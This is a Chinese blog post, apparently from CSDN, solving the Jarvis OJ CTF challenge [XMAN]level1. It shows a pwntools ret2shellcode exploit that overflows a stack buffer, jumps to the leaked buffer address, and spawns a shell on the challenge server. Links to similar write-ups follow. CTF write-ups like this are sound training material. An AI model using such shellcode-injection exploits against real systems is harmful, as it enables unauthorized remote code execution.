[Jarvis OJ - PWN]——[XMAN]level1

最新推荐文章于 2021-08-12 17:14:00 发布
最新推荐文章于 2021-08-12 17:14:00 发布
阅读量300 收藏
点赞数
分类专栏: # Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113527219
版权

[Jarvis OJ - PWN]——[XMAN]level1

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:
    在这里插入图片描述
    先checksec一下,什么保护都没有开。32位程序。
    在这里插入图片描述
    看看IDA,找到了可以利用的栈溢出的read函数.
    在这里插入图片描述
    在这里插入图片描述
    开开心心的去找system函数.找了半天没找到,同时也没有/bin/sh字符串
    在这里插入图片描述
    并且这道题什么保护都没开,应该是ret2shellcode的pwn题.buff2的地址题目给输出了出来.所以
    exp:
from pwn import *
p = remote("pwn2.jarvisoj.com", 9877)
shellcode = asm(shellcraft.sh()).ljust(0x88,"\x00") # 可以理解为system("/bin/sh")
ret_addr = p.recvline()[14: -2]
ret_addr = int(ret_addr, 16)
payload = shellcode + "a"*(0x4) + p32(ret_addr)
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
Jarvis OJ - [XMAN]level1 - Writeup
baikeng3674的博客
09-25 133
Jarvis OJ - [XMAN]level1 - Writeup M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html 题目: 分析 checksec检查保护机制如下,NX没开,可以通过执行shellcode来get shell 拖到IDA中,查看函数的流程,vulnerabl...
Jarvis OJ-PWN-[XMAN]level1 wp
分不清东西南北的Laffey
09-26 1092
地址:nc pwn2.jarvisoj.com 9877 第一步:用checksec看开启了哪些保护 32位的 程序编译时关了栈不可执行保护 第二步:用IDA看伪代码 进去之后F5看到主函数 跟进vulnerable_function()函数 第三步:找到溢出点并加以分析 我们需要覆盖函数的返回地址 将其地址覆盖成shellcode的返回地址 这道题不像level0 里面有system函数...
jarvis OJ部分writeup
aoque9909的博客
02-23 163
[XMAN]level 0 [XMAN]level 1 —— 简单shellcode利用 [XMAN]level 2 [XMAN]level 3 —— ret2libc尝试 [XMAN]level2&level3 x64 [XMAN]level 4 —— DynELF [XMAN]level 5 smashes ——SSP leak & ELF重映射 Te...
2021 Xman 排位赛 pwn nowaypwn
yongbaoii的博客
08-12 424
学了不少东西。 tea加密。 以为很难,但是说来很简单。 内容8字节一组,密钥16字节一组。 加密算法 #include<stdio.h> void encode(unsigned int* v,unsigned int *k) { unsigned int l=v[0],r=v[1]; unsigned int k0=k[0],k1=k[1],k2=k[2],k3=k[3]; unsigned int delta=0x9e3779b9; int i;
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 376
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
18.9.18 Jarvis OJ PWN----[XMAN]level1
qq_42192672的博客
09-18 187
拖进IDA 这次先是一个vulnerable_function函数,再是一个write函数 查看保护机制,发现没有开启,大佬说保护机制没开启,就可以用shellcode啦 接下来看函数内部 可以看到buf的缓冲区大小为0x100个字节,但是其偏移量是0x88个字节 在0x88个字节中首先要留出shellcode的空间(注意这里是32位的) 最终返回的地址显然也要返回到shell...
Jarvis OJ [XMAN]level1 write up
03-12 107
首先 老规矩,把软件拖到Ubuntu里checksec一下文件 然后知道了软件位数就放到IDA32里面。。。 熟悉的函数名。。。 缘真的妙不可言。。。 然后看了下vulnerable_function函数的栈结构 算了下 vulnerable_function中的read函数准备给buf 0x100的空间 但是buf却用了0x88+0x4就结束了vul...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1235
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用
aoque9909的博客
11-26 219
100分的pwn 简单查看一下,果然还是比较简单的 放到ida中查看一下,有明显的溢出函数,并且在函数中打印出了字符串的地址,并且字符串比较长,没有NX保护 所以我们很容易想到构造shellcode,在栈中执行shellcode拿shell权限 shellcode是一段恶意代码,在没有NX保护程序中,可能作为输入而写进栈,之后运行到此处时可以执行shell...
JarvisOJ.docx
03-10
JarvisOJ
JarvisAlgorithm:Jarvis算法-Java
03-06
带有GUI的Java程序,允许您通过单击GUI屏幕在一组点上运行Jarvis算法。 在计算几何中,礼品包装算法是一种用于计算给定点集的凸包的算法。 Jarvis算法(或也称为礼品包装算法)
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
名人档案(辛弃疾、李清照)(1).docx
04-23
名人档案(辛弃疾、李清照)(1).docx
._moood UI KitAdobeXD源码下载设计素材UI设计.xd
04-23
._moood UI KitAdobeXD源码下载设计素材UI设计
full_circle_appAdobeXD源码下载设计素材UI设计.xd
04-23
full_circle_appAdobeXD源码下载设计素材UI设计
Gym_Responsive_Landing_PageAdobeXD源码下载设计素材UI设计.xd
最新发布
04-23
Gym_Responsive_Landing_PageAdobeXD源码下载设计素材UI设计
SQL详细介绍资料.zip
04-23
sql,SQL(Structured Query Language,结构化查询语言)是一种标准化的语言,用于在关系数据库管理系统(RDBMS)中存取和操作数据。SQL 使得用户能够访问和操作数据库中的数据,包括数据的查询、插入、更新和删除,以及数据库结构的创建和修改。
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值